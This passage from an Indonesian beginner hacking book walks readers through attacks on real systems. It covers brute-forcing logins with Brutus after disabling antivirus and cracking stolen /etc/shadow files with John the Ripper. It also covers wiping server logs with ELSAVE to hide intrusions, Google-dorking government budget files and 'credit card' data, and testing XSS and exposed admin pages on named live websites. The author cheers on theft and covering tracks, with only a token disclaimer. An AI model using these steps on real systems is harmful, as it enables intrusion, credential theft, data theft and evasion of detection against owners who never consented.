Gambar 3. 38 Akibat yang ditimbulkan karena kesalahan


setting pada modul /SecureLoginManager/list.asp

Wow ... wow keren kannnnn .... umh... yang pasti jika
bisa ke halaman ini anda bisa menyalahgunakannya untuk
mendaftarkan diri anda sebagai ADMIN ... enak kan ...
bahkan mengetahui seluruh password member atau
admin, seluruh email address member dan masih banyak
lagi lah. Kasarnya anda baru bekerja sehari di sebuah
kantor, tapi anda memegang kunci dokumen perusahaan,
kunci kas, kunci kamar mandi cewek dan kunci – kunci
penting lainnya. Anda dapat membuka kas, lemari
dokumen perusahaan dan kamar mandi cewek dengan
seenaknya ... bukankah itu menyenangkan
huihihihihihihi! (Set Iblis Mode On) -> Idih YM bangeth..

3.6 Kelemahan Password

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 98


4 HARI MENJADI HACKER

Terkadang (bukan terkadang lagi...) orang sering


menyepelekan password, padahal passwrod sendiri
adalah sesuatu yang sangat penting. Orang sering salah
kaprah mengartikannya. Lebih baik membuat password
yang mudah diingat kata – katanya, seperti nama pacar,
nama istri, tanggal lahir, jabatan, bahkan diisi dengan
kata ’password’ atau ’Password’. Hal tersebut sebenarnya
secara tidak sengaja membuat sebuah lubang yang
sangat besar di dalam sistem keamanan. Ya mungkin
dapat dimisalkan kita punya sebuah rumah dan rumah
tersebut mempunyai kunci, karena yang memerlukan
keberadaan kunci tersebut banyak, ketika kita bepergian
ke luar rumah, kita sering menyimpan kunci tersebut ke
dalam pot, rak sepatu di bawah keset atau di suatu
barang yang ada di depan pintu masuk rumah. Seorang
maling yang handal akan mengetahui tempat
penyimpanan tersebut, karena tempat penyimpanan
tersebut adalah ’default’ atau kata lainnya ’pasti sebuah
kunci rumah akan ditempatkan di salah satu benda yang
berada di depan pintu rumah’. Nah sama seperti
password, jika kita mempunyai password ’default’, maka
dengan mudah si cracker akan menebak password anda,
password default yang sering digunakan adalah:

- nama belakang user


- nama istri
- tempat lahir
- tanggal lahir
- kode pos user
- nama pacar

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 99


4 HARI MENJADI HACKER

- beberapa kata yang berhubungan


dengan user

Beberapa kata yang berhubungan dengan user


yang sering digunakan disini misalnya ’Password’,
’administrator’, ’admin’, ’nimda’ dan lain lain. Bahkan di
pentagon (salah satu badan keamanan US) beberapa
petingginya memakai (maaf) kata ’Fuckit’ sebagai
password default mereka.

Contoh Password yang Buruk

Beberapa orang memang terkadang menjadikan


sebuah password itu adalah sebuah kata – kata yang
mudah diingat, seperti nama istri, nama pacar atau
tanggal lahir. Hal inilah yang menjadikan bumerang ke
user itu sendiri. Karena penggunaan password yang
terlalu mudah diingat, maka dengan mudah pula akan
tertebak oleh para cracker. Tanda – tanda password yang
buruk adalah :

1. Terdiri dari 2 sampai 7 karakter atau kurang.


2. Terdiri dari satu suku kata, misalnya, makan,
minum, bunga, indah dan lain – lain.
3. Tidak terdiri dari campuran angka dan huruf.
4. Terdiri dari campuran angka dan huruf tetapi
masih ada artinya, misalnya adm1n, h4ck3r,
cr4k3r, ku3 dan lain – lain.
5. Terdiri dari tanggal lahir.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 100


4 HARI MENJADI HACKER

Jika password terdiri dari satu suku kata, cracker


dengan mudah menggunakan list dari kamus yang
biasanya dimasukkan ke cracklist mereka, contoh cracklist
dari password cracker :

12345
abc123
password
computer
123456
tigger
1234
a1b2c3
qwerty
123
xxx
money
test
carmen
mickey
secret
summer
internet
service
...

Jka kita mempunyai password yang terdapat di salah satu


cracklist tersebut, maka ... selamat anda termasuk orang
yang mempunyai password yang buruk.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 101


4 HARI MENJADI HACKER

Contoh Password yang Baik

Password yanga baik terkadang sangat susah


sekali untuk diingat, tetapi mau tidak mau kita harus
mengingat password tersebut, minimal terdiri dari dua
suku kata jika anda tidak ingin mengahapalkan antara
campuran karakter dan angka. Memang terkadang susah,
tapi jangan sekali – sekali anda mencatat password yang
susah tersebut di catatan kecil yang ditempel di dinding
atau kulkas. Spesifikasi password yang baik adalah:

1. Terdiri dari 7 karakter lebih.


2. Terdiri dari dua suku kata, misalnya, makanapa,
minumair, bungaditaman, indahsekali dan lain-
lain.
3. Terdiri dari campuran angka dan huruf misalnya,
1xx2bgh, ghj556yu, 78iirt.
4. Tidak terdiri dari tanggal lahir.

Hal tersebut untuk menghindari kemudahan penge-


crack-an password sehingga mau tidak mau password
kita mempunyai spesifikasi seperti di atas.

Implementasi Password yang Baik

Implementasi dari password baik ini tentu saja


agar tidak mudah di-crack oleh orang yang tidak
bertanggung jawab dunk. Tools – tools untuk meng-crack

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 102


4 HARI MENJADI HACKER

password sendiri sebenarnya banyak sekaleh ... tapi di


sini saya hanya menjelaskan beberapa saja, yaitu:

- BRUTUS
- JOHN THE RIPPER (JTR)

BRUTUS

Brutus, kayak nama musuhnya popeye si


pemakan bayam, hahahahahha .... ya itu tuh orangnya
yang gede badannya, terus brengosan (baca: jenggotan)
dan anak buah kapal, tau sendiri kan anak buah kapal
gimana, kalau udah ketemu daratan dan wanita...
huaaaaahhh kayak mau dimakan ajah tuh ...hahahahah
... becanda lagi, sorry pak marinir!!!! Sama seperti
software brutus penjebol password ini. Kalau udah liat
server atau yang berhubungan dengan login, user dan
password... udah deh kayak mau dimakan ajah tuh ...
Cara penggunaannya pun gampang kok,
interface-nya sangat user friendly sekali, sehingga jika
anda baru menggunakan pertama kali saja bakalan tau n
... ya kaayak naek sepedah ajah gituh ... langsung bisa
deh pokoknya.
Tapi mas saya bener – bener ndak tau cara
menggunakan brutus ini ... saya .. saya ... udah – udah
... stop stop ... akan saya jelaskan yah (hadoh hadoh...
makanya anak – anak, user kayak gini jangan ditiru, don’t
try this at home, jika anda tidak tau cukup buka
www.google.co.id kemudian isi kotak pencarian dengan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 103


4 HARI MENJADI HACKER

apa yang ingin anda ketahui ... internet itu luas was was
... banyak pengetahuan yang bisa didapat disitu ... dari
pengetahuan tentang wanita sampai pengetahuan
tentang teknologi, tapi satu ... internet tidak akan pernah
tau dimana TUHAN ... hihihihih! Sok agamis ah ....)

Cara menjalankan brutus yah ... ”Kembali ke LAPTOP”


(Kata – katanya kayak acara aneh yang ada di salah satu
stasiun tv swasta tuh), entah kenapa saya suka ...
pembawa acaranya agak aneh kalik ... mirip temen saya
... namanya eLkari, keren kan namany tapi tetep aja
wajahnya eL Tukul ... huahahahhaha ... udah udah ....
okay lanjut aja yah ...

1. Donlot brutus di websitenya, saya lupa tuh tapi


kalau mau CARI DI WWW.GOOGLE.CO.ID okay
....
2. Jalankan brutus, maka akan muncul sopware
seperti gambar berikut:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 104


4 HARI MENJADI HACKER

Gambar 3. 39 Aplikasi Brutus Penjebol Password

3. Nah tinggal isi target dengan IP Address yang


ingin kamu serang

Gambar 3. 40 Mengisi target IP Address

4. Kemudian pilih tipe penyerangannya, apakah


HTTP (Basic Auth), HTTP (Form) atau tipe
lainnya.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 105


4 HARI MENJADI HACKER

Gambar 3. 41 Pilih tipe penyerangan

5. Kemudian pilih metode HTTP nya apakah HEAD,


GET atau PUT

Gambar 3. 42 Memilih metode HTTP

6. Kemudian hilangkan tanda pada pilihan Use User


name

Gambar 3. 43 Hilangkan tanda pada pilihan Use


Username

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 106


4 HARI MENJADI HACKER

7. Sekarang tinggal klik tombol dan


tunggu aja ...

8. Sambil mengamati indikator yang ada di kanan


bawah program tersebut, jika sudah sampai
100% dan ditemukan password, sepertigambar
berikut, tinggal login ajah ...

Gambar 3. 44 Indikator Brutus bahwa ada password yang


telah terjebol

Mudah sekali bukan ... so simple untuk menjadi cracker


... walaupun masih tingkat memakai toolz ☺ tapi gak papa
proses kok , seorang presiden pasti melalui proses
menjadi anak kecil dulu kan ... gak mungkin dia akan lahir
langsung dari ibunya udah memakai baju presiden ... tul
gak ... so jangan takut melalui proses menjadi seorang
LAMER sebelum menjadi seorang HACKER ... tapi
dimohon jangan jadi LAMER terus dunks ... hahahahah!!!!

---------------------------------------------------------------------
UNTUK MENJALANKAN BRUTUS SEBAIKNYA ANDA
MEMATIKAN ANTIVIRUS, KARENA ANTIVIRUS
MENDETEKSI BRUTUS SEBAGAI MAILICIOUS CODE ATAU

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 107


4 HARI MENJADI HACKER

KODE BAHADUR ( BAHASA INDONESIANYA


BERBAHAYAK)
---------------------------------------------------------------------

JOHN THE RIPPER

Nah ini lagi namanya aneh bangeth ... tau gak


film John the Ripper ... itu tuh film pembunuhan dimana
korban – korbannya dibunuh secara kejam. Iyah emang
software cracker namanya aneh dan mengerikan. Yah
memang harus mengerikan, karena jika password kita
ketahuan di dunia cyber, sama saja kita telah dibunuh
oleh orang atau user jalang yang mengetahui password
kita, tul kan ... kita gak bisa apa – apa lagi. Email kita
bakal diacak – acak, website kita bakal diobok – obok ..
ck ck ck!
Coba kalau software password cracker diberi
nama dengan petruk, gareng atau bagong ... wah bukan
jadi password cracker ntar, malah jadi ria jenaka (halah!),
ato aming sekalian ... (KALO AMING MEMANG
MENGERIKAN SIH)... hahahahahh!!!! Just kidding ... gini
nih kalo kebanyakan nonton pilem ...

Sebelum anda meng-crack sebuh password, pastinya


anda harus ada file passwordnya dunk ... kalo gak ada
apa yang mau di-crack... betul gak ..Mencuri password
adalah pekerjaan yang mudah bagi para maling. Bahkan
beberapa password situs porno yang dibobol pun sering
disebarluaskan di situs – situs underground internet dan
dibagikan secara gratis. Berbeda dengan password untuk

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 108


4 HARI MENJADI HACKER

transaksi di bank atau money transfer lainnya. File


password untuk transaksi tersebut dijual secara potongan
oleh para cracker yang tidak bertanggung jawab. Hal ini
dikarenakan informasi tersebut sangat penting sekali,
sehingga memang sangat – sangat berharga dibanding
dengan password situs porno.Untuk mencuri suatu file
password kita harus tau, file password tersebut
sebenarnya terletak dimana, jika anda memakai system
operasi linux maka file passwordnya ada di /etc/passwd
dan file shadows-nya atau file pendekripnya ada di
/etc/shadow.

Okay untuk menjalankan atau meng-crack password


dengan JTH ikuti langkah berikut ini:

1. Download John The Ripper(JTR) untuk meng-


crack password nya yang ada di
www.openwall.com/john/

2. Extract file JTR tadi ke dalam sebuah folder.

3. Kemudian buka John The Ripper lewat DOS


(Diskette Operating System) Shell

4. Pertama kali yang harus dilakukan adalah


menggabungkan file /etc/shadow dengan file
/etc/passwd untuk memudahkan proses crack.
Caranya jalankan perintah dengan syntax di
bawah ini :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 109


4 HARI MENJADI HACKER

Unshadow [spasi] filepassword [spasi] fileshadow


[spasi] >> [spasi] filecrack.txt

Contoh, anda punya file /etc/shadow, kopi aja ke notepad


isinya dan simpan dengan nama …. Apa yah??? Umh ...
shadow.txt aja yah, kemudian /etc/passwd simpan juga
dengan nama passwd.txt, maka penulisannya pada DOS
shell seperti berikut:

Unshadow passwd.txt shadow.txt >> cracker.txt

Gambar 3. 45 menggabungkan file dengan perintah


unshadow
Kemudian tekan enter …

Maka hasil penggabungannya akan disimpan di file


cracker.txt

5. Setelah itu gunakan perintah John-mmx


cracker.txt untuk meng-crack user dan password.
Penulisan perintahnya :

John-mmx cracker.txt

Kemudian tekan enter …

Nah ketemu kan user dan passwordnya :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 110


4 HARI MENJADI HACKER

Gambar 3. 46 Meng-crack password dengan perintah


john-mmx

Pada gambar ini kita bisa melihat user : cobra dan


passwordnya adalah birkr, tinggal coba login aja deh ...

3.7 Menghilangkan Jejak

Jurus selanjutnya adalah jurus yang paling jarang


dilakukan oleh seorang hacker. Jika ingin benar – benar
mulus, atau tidak terdeteksi, kita harus menghapus file –
file log, apaan tuh file – file log??? File log adalah file yang
isinya seluruh kejadian yang ada di server. File log seperti
alat perekam, seluruh kejadian, user yang melakukan
login dan logout, penjebolan jaringan semuanya akan
dicatat dan disimpan di file log. Kalau pada manusia ya ...
seperti malaikat ... mereka akan mencatat ... apa pun
yang dilakukan oleh manusia, dan hasilnya akan
dipertanggung jawabkan kelak di hari akhir nanti. Anda
minum, maen perem ... maen sepeda maksudnyah ☺ ,
ngobat, menjebol server atau apa aja akan dicatat, dan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 111


4 HARI MENJADI HACKER

sayangnya malaikat tidak seperti file log, seluruh catatan


yang sudah dicatat oleh malaikat tidak bisa dihapus, ...
hahahahah ... tapi kalau pada file log di server bisa
dihapus ... hihihihihihi ... ahhh ... seandainya ada alata
untuk menghapus apa yang dicatat oleh malaikat ... kita
bisa berbuat seenaknya pasti ... kikikik! Semoga saja tidak
ada yang bisa menemukannya yah ... kalau bisa ... wow
... dunia bakal kacau sekali bukan ... HALAHHHHH malah
ceramah si bapak ini ... woi!!! Bukan buku agama neh ...
buku komputer tauk !!!! Loh sekali – sekali dunks ... salah
gueh?? mau nulis kayak gini ...???? Salah mas ini kan
buku komputer jadi nulis all about komputer dunk ... nanti
kalau mas-nya nulis buku agama baru deh boleh nulis
kayak ginih ...Lo kan Cuma dikit aja nulisnyah ...
emangnya emang...SUDAH SUDAH... kelainya SUDAH ...
ojo seng Mboten – mboten lah (Jangan yang enggak
enggak lah) ... hihihi bahasa jawa maksa euy ... maklum
bukan lidah Jawa asli ... mau bahasa Sunda juga susah...
maklum bukan ..... Nah nah nah mulai lagi kan ... tadi
agama sekarang bahasa ... lama – lama apalagi ... bisa –
bisa jadi buku Gado – gado ntar ... bahasannya ke sana
kemari .. hayoh hayoh ... loh!!!BUEBAS toh ... saya mau
nulis apa di buku ini juga gak masalah, kan APS, Asal
Pembaca Senang .. pokoknya ... SUDAH SUDAH ... ini
Cuma ngebahas masalah penghilangan jejak eh malah
ngalor ngidul ke sana kemari ... okeh okeh ... kembali ke
jalan yang benar ... jadi masalah penghilangan jejak tadi
kita dapat memakai software yang namanya ELSAVE ...
apaan tuh?? Kayak merk pencukur jenggot ... ITU
GILETTE SAYANGGGG... udah deh plesetannya garing ...

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 112


4 HARI MENJADI HACKER

hahahahah! Okay kembali lagi ... jadi ELSAVE itu adalah


software untuk menghilangkan jejak atau file log,
sehingga seluruh kelakuan bejat kita untuk menjebol
server, meng-cracking password tidak akan ketahuan ...
tul gak???Umh .. ELSAVE ini juga bekerja under DOS, jadi
untuk menjalankan ELSAVE ini harus dilakukan di DOS
shell. Untuk menjalankannnya gampang ajah ...

1. Donlot ELSAVE di internet, CARI DI GOOGLE


AJAH ... saya lupa dimana donlotnyah ...

2. Kemudian ketik

ELSAVE /?

dan tekan enter, maka akan muncul parameter –


parameter yang ada di ELSAVE.

Gambar 3. 47 Aplikasi ELSAVE pada DOS

Sekarang kita bahas parameter ELSAVE tersebut:

-s \\server
Untuk mendefinisikan nama server dimana lo pengen
ngapus file log-nya.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 113


4 HARI MENJADI HACKER

-F file
Untuk menyimpan file log ke direktori dan nama file
tertentu

-l log
Untuk memberi nama log atau file log

-q
Parameter ini sebaiknya dijalankan ketika ELSAVE
menjadi sebuah service di windows, misalnya ingin
menjalankan ELSAVE tiap hari senin, tiap selasa, atau tiap
jam memnghapus log atau file log

-C
Menghapus file log yang tidak terdefinisi

Contoh Penggunaan ELSAVE


Menyimpan file log dari \\serv1 ke
\\serv1\d$\application.log:
elsave -s \\serv1 -F d:\application.log
Menyimpan system log di komputer lokal / sendiri ke
direktori d:\system.log dan menghapus log tersebut:
elsave -l system -F d:\system.log -C

3.8 DoS (Denial of Service Attack)

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 114


4 HARI MENJADI HACKER

DoS atau Denial of Service Attack adalah


metode penyerangan jaringan dengan cara
membanjiri jaringan dengan mengirim data dari
komputer satu ke komputer lain. Bukan DISKETTE
OPERATING SYSTEM loh!!! And gak ada
hubungannya dengan itu. Sangat efisien jika yang
diserang adalah komputer server, maka jaringan
yang ditangani atau disebut down link / client dari
server tersebut akan ikut lambat, karena lalu-lintas
jaringannya dipenuhi oleh file-file sampah.
Wah gak mudeng (baca : mengerti)….coba
tolong jelasin konsep DoS attack mas. Baeklah,
mungkin jika digambarkan dengan ilustrasi akan
lebih mengerti.

Melakukan DoS attack


dengan mengirim file
sampah yang ukurannya
besar

Server Pelaku
1

Client Client Client


1 2 3

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 115


4 HARI MENJADI HACKER

Karena server menerima beban begitu besar,


maka untuk melakukan broadcast ke jaringan akan
lambat, karena jaringan dibebani file-file yang besar
pula sehingga lalu-lintasnya padat. Jika penyerangan
ini dilakukan terus-menerus akibatnya menjadi
parah, server hang atau ngadat (down), sehingga
untuk menjalankannya harus direstart ulang. Web
server di internet yang mendapat serangan seperti ini,
situsnya tidak dapat diakses, kadang bisa diakses
tetapi sangat lambat sekali. Ya walaupun tidak
seefektif menggunakan metode pencurian password,
paling tidak kita dapat memperlambat lalu lintas
jaringan. Tidak perlu sampai satu negara yang
terkena imbas seperti ini, satu kota saja cukup
membuat sysadmin jaringan tersebut kewalahan.
Ada banyak macam jenis penyerangan
menggunakan ping atau serangan DoS attack seperti
flood, smurf-attack, ping-o-death, syn attack, echo_reply
dan lain-lain.

Hoi .. hoi ... bangun euy .. semedimu sudah


sempurna nak, sekarang tidurlah dulu, besok kamu akan
turun gunung untuk menjadi seorang penjahat .. jadi
persiapkan dirimu baik baik, sebaiknya .3gp, .jpg, .dat
dan film – film XXX lainnya kakek simpan, soalnya tau

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 116


4 HARI MENJADI HACKER

ndiri kan 2 hari semedi tanpa kayak gituan pasti membuat


kamu naek birahi ... so TIDUR AJAH ... KAKEK MAU
NONTON!!!OKEH ...

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 117


4 HARI MENJADI HACKER

HARI KETIGA

BAB IV

Hari Ketiga

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 118


4 HARI MENJADI HACKER

TURUN GUNUNG MEMPRAKTEKKAN


ILMU HACKING

Nah setelah kalian membaca bab III dan


bersemedi, kemudian tidur sebentar untuk memulihkan
tenaga, akhirnya hari turun gunung telah tiba, carilah
warnet terdekat atau cafe yang punya hotspot gratis , biar
bisa puas – puas nongkrong di situ. Saatnya kalian
menguji ilmu yang telah diturunkan melalui buku ini ☺
apa syiiiiiiiiiiii ......

4.1 Mencari (Mencuri) Dokumen Penting dengan


bantuan paman Google

Waks !!!! .... apa - apaan ini? membahas pencurian ????


sepertinya tidak .... ini hanya untuk IPTEK .... jadi untuk
penyalahgunaannya kami tidak bertanggung jawab...
Kenapa Harus data APBD sih???kenapa tidak
APBN...sebenarnya APBD itu apa? Kenapa penting banget
gitu lohx??? Lets check it out.....

APBD atau APBN

APBD adalah Anggaran Pendapatan dana Belanja Daerah


sedangkan APBN adalah Anggaran Pendapatan Belanja

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 119


4 HARI MENJADI HACKER

Negara...

Memang Sistem Informasi Untuk daerah atau Negara


dalam Hal Ini Pemda atau Pemkot sekarang sudah
terkoneksi dengan internet... tetapi apakah udah
Safe???Apakah sudah aman...atau bahkan data APBD
atau APBN yang seharusnya tidak diumbar - umbar atau
di perlihatkan secara Jelas di google adalah sesuatu yang
tabu.

lah kok bisa ada di google sih....hmmmm...itulah


pertanyaannya,...kenapa hanya dengan memakai google
saja kita sudah bisa mendapatkan data ini? Memang
bagus para Pemda atau Pemkot menggunakan komputer
jaringan atau server internet untuk mempermudah
pekerjaannya. Tetapi secara nih.....mohon diperhatikan
masalah sekuritas dan keamanannya....kenapa harus
diperhatikan ??? YA IYALAHHHHH Please deh.... untung
data hanya jatuh ke tangan pihak yang bertanggung
jawab tetapi sebenarnya tidak tahu kegunaan data
tersebut...Lha kalau jatuh ke tangan negara lain atau
pihak yang teu tentang kegunaan data tersebut???Pantes
saja selama ini Indonesia diobok2 oleh negara lain, pantas
saja selama ini wilayah indonesia dipotong negara
lain...atau paling tidak para pengguna data tersebut tahu
pagu anggaran dari APBD sehingga mereka dapat
menggunakan data tersebut sebagai acuan untuk
membengkakkan dana alias mark up projek projek. enak
sekali bukan...kebetulan di Indonesia juga belum ada
servis sekuritas atau pencurian data, jadi pencurian data

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 120


4 HARI MENJADI HACKER

ini tidak dibisniskan sebagai salah satu kegiatan ilegal.


Kalau di luar negri mungkin sudah... nilai data pemerintah
saja bisa bernilai $800-$1000 per data ,...ya sedikit lebih
rendah dari data perusahaan swasta.

Bukan berarti jika di dalam negeri tidak dibisniskan terus


kita tenang - tenang saja untuk tidak memperhatikan
sekuritasnya dunk! Dapat saja data - data APBD kita
diperjualbelikan oleh orang luar negri...MAU GITU...data
penting di Indonesia diperjual belikan di luar...?????

PROSES PENCARIAN/PENCURIAN

Sangat gampang sekali...semua orang juga bisa kok...


hanya memanfaatkan bahasa pemrograman search
engine google saja sudah bisa, jadi peralatan yang
diperlukan:

1. Komputer
2. Google
3. Kreatifitas

Kalau biasanya kita menggunakan google untuk mencari


gambar joor (Baca jorok), atau artikel buat tugas
kuliah...sekarang kita mencoba menggunakannya untuk
mencari data yang agak tinggi nilainya..., caranya
mas???Ikuti aja petunjuk berikut ini:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 121


4 HARI MENJADI HACKER

1. buka situs google

2. Kemudian ketik filetype:xls data pembuangan


sampah, maka akan terlihat di google list - list
alamat seperti di bawah ini:

Gambar 4. 1 List alamat website yang dicari memakai


kata kunci sakti google

3. nah donlot aja file tersebut...kemudian lihat


pada bagian DINAS KESEHATAN...kira - kira ada
nggak yang kira - kira informasi penting yang
bisa kita ambil...ada kan!!!coba lihat selisih dari

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 122


4 HARI MENJADI HACKER

9.680.220.108 dengan 9.597.399.018, hasilnya


adalah tulisan berwarna merah 82.821.000 ,
maksudnya apa ini???Hemmm...kemungkinan
saja dana sisa atau mungkin juga selisih
pembengkakan dana yang dilakukan, saya tidak
tahu karena saya bukan orang ekonomi... selain
itu kita dapat melihat pagu anggaran yang
disediakan di APBD 2006 ini sehingga kalau kita
ingin ikut proyek tender pemerintah kita dapat
mengajukan harga proyek kita sama bahkan
hampir sama dengan anggaran yang
disediakan....

Gambar 4. 2 Potongan APBD 1 suatu PEMDA di file MS


Excel

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 123


4 HARI MENJADI HACKER

Gambar 4. 3 Potongan APBD 2 suatu PEMDA di file MS


excel

Nah betapa berharga sebenarnya data ini .... masih


bertanya lagi apa perlu diumbar atau dirahasiakan data
ini ???? I dont think so ....

SYNTAX GOOGLE

Nah untuk memahami proses pencarian di google


gampang saja...sebenarnya kita hanya menggunakan
fasilitas dari google itu sendiri, keterangannya adalah sbb:

coba kita simak contohnya:

filetype:namafile [spasi] site:namasitus [spasi]


judulfileyangdicari

Kemudian lihat pembahasan syntax google berikut satu


persatu

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 124


4 HARI MENJADI HACKER

filetype:
untuk mencari file berekstensi tertentu, kalau tadi di atas
kita menggunakan filetype:xls maksudnya kita hanya
mencari file .xls saja atau file excel...karena umumnya
PEMDA menulis APBD atau Laporan keuangan
menggunakan Excel... coba cari dengan extensi lain .mdb,
.doc atau .sql bisa gak???

site:site
di sini fasilitas untuk mencari di suatu situs tertentu, kalau
mau mencari di situs com saja ya tulis saja site:com atau
mau cari di situs berakhiran gov ya tulis site:gov

Sedangkan judulfileyangdicari adalah nama file yang ingin


kita cari kalau pada gambar di atas sebelumnya kita
mencari dengan nama file 'data pembuangan sampah',
nah coba lebih kreatif dengan mencari data data yang top
secret...tinggal tulis saja "TOP SECRET DATA" atau "data
apbn" atau "data keuangan" atau "credit card" ya
pokoknya kreatip kreatip anda lah....
Sekarang sudah tau kan betapa berharganya sebuah data
jika jatuh ke tangan orang - orang yang 'benar'. Sekali
lagi hal ini bukan untuk apa - apa, hanya sekedar
membagi ilmu pengetahuan...
Data yang diambil rata - rata beralamat go.id
semua, apakah ini mencerminkan bahwa pemerintah
Indonesia mempunyai teknologi IT dengan sekuritas yang
begitu menyedihkan???Only God Knows Why

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 125


4 HARI MENJADI HACKER

4.2 MENCUMBUI BUKU TAMU WEBSITE DENGAN


XSS (Cross Site Scripting, Bukan XXX ya)

Okay contoh kasus disini kita akan mencoba salah satu


website yang ada di internet, caranya ????? Ikuti aja
langkah berikut ineh ... okeh ... Oiya dengan catatan kita
mencari bug xss ini menggunakan kekuatan paman
Google dan situs yang menggunakan CMS, apa itu CMS
...HALAHHHHHHHH!!! Hare gene blum tau SMS eh CMS
baca aja di internet... banyak kok keterangannya. Okay
kita mulai :
1. Masukkan di kotak search google dengan kata
kunci:

"powered by CMS Made Simple" comment

2. Kemudian tekan enter, maka akan muncul


website – website yang menggunakan CMS

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 126


4 HARI MENJADI HACKER

Gambar 4. 4 Mencari situs yang menggunakan “CMS


Made Simple”

3. Pilih aja salah satu ... teserah yang mana ,... umh
kayaknya kita menemukan dey coba kita pilih
salah satu .... www.loisant.org

4. Buka website tersebut maka akan muncul gambar


websitenya sbb :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 127


4 HARI MENJADI HACKER

Gambar 4. 5 Situs dengan buku tamu atau guest book


yang dibuat dari “CMS Made Simple”

Okay... kliatan gak?????GAK MASSS....umh... perbesar


yah ...

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 128


4 HARI MENJADI HACKER

Gambar 4. 6 Situs yang memakai “CMS Made Simple”


diperbesar, biar jelas getoh!!!

Lumayan kliatan kan ...

5. Umh sekarang kita isi textbox nya seperti pada


gambar berikut :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 129


4 HARI MENJADI HACKER

Gambar 4. 7 Mengisi guest book atau buku tamu untuk


membuat kesalahan XSS pada situs

6. Nah sekarang coba klik submit, apa yang


terjadi???
7. Ups, akan muncul kotak sbb :

Gambar 4. 8 XSS Berhasil dibuat

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 130


4 HARI MENJADI HACKER

Nah dari mana bugs tersebut ditemukan????Okay coba


lihat gambar sebelumnya... pada textbox comment kita
mengisi skrip seperti ini kan:

<script type="text/javascript">alert('XSS
BUG Ditemukan euy..')</script>

Apaan lagi nih mas, makin gak ngerti … tenang ajah …


akan saya jelaskan … saya berjanji 4 hari kemudian
setelah anda membaca buku ini anda akan menjadi
hacker, percayalah percayalah … (muka manis mode on)
… okeh okeh saya jelasin yak … jadi script ini adalah
potongan dari kode html, coba baca buku tentang
pemrograman html, pasti akan ada pembahasan ttg skript
html ini, saya jelaskan dikit aja yah … dikiiiit aja …soalnya
skripnya Cuma dikit she …

<script type="text/javascript">
Awal dari perintah html script dan mendefinisikan type
scriptnya adalah java script, masih ingat kan sebenarnya
bahasa pemrograman web itu ada vbscript, javascript dan
lain – lain...disini kita memakai java script
alert('XSS BUG Ditemukan euy..')
Membuat dan memunculkan kotak dengan isi ”XSS BUG
Ditemukan euy..” seperti pada gambar diatas itu ..

</script>

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 131


4 HARI MENJADI HACKER

Akhir dari perintah script


---------------------------------------------------------------------
Bug XSS ini sebenarnya tidak terlalu berbahaya, tapi kalau
dibiarkan akan menganggu juga… bahkan orang dapat
menggalinya sampai memunculkan kerusakan yang
bersifat medium gitu, So jangan meremehkan bugs ini …
okay …
---------------------------------------------------------------------

4.3 MENCARI KESALAHAN SECURE LOGIN v1.0

Kali ini kita akan mencoba mencari tahu atau mencoba


jurus Secure Login ini di situs luar negeri ... caranya
mas..??!!??. caranya ....???!!!?? Pembaca kalau udah
masuk ke pembahasan cara udah deh ... waktu kencan
lewat kalek ... buat bela – belain baca ni cara ... SECARA
gitu loh!!!! Bahasa apa sih sebenarnya ituh??? Kayaknya
trend 2007 ini bahasa yang menggunakan kata – kata
SECARA .. beh beh beh hidup loh GEUL BENJET ... masa
oloh!!!! Ini pasti gara – gara sering ngumpul – ngumpul
ama orang – orang salon yak!!! OKAY OKAY ... cukup
becandanya ... let’s check out the methode below here
(maksudnya liat dan pelototin cara yang saya tulis di
bawah ini, nyuk!):

1. Seperti biasa, kita minta bantuan ke uncle google,


adududu... pamanku yang satu ini baik banget
kan ... menyediakan segala akses untuk melihat
kelemahan dan informasi tentang website target

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 132


4 HARI MENJADI HACKER

.. uhihihihihi!!!! Okay buka www.google.co.id


(patriotisme, jadi kudu pakek co.id).
2. Kemudian tulis di kotak pencariannya salah satu
script secure login tadi, pilih salah satu aja script
di bawah ini:

/set_preferences.asp

/send_password_preferences.asp

/SecureLoginManager/list.asp

Umh … biar seragam kita coba script yang ada di bawah


ini:

/SecureLoginManager/list.asp

Aja okay ..

3. Lalu tekan tombol Cari atau Search dan lihat di


daftar google, pilih salah satu aja ... let see ....
umh yang mana yah??? Coba kita pilih
www.ensaga.com , website apa tuh .. i dont
know, soalnya asal nyabut ajah...kayak nomor
undian gituh ...

4. Ok, tinggal diklik alamat site-nya tadi dan BOOM


... muncul gambar Sbb :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 133


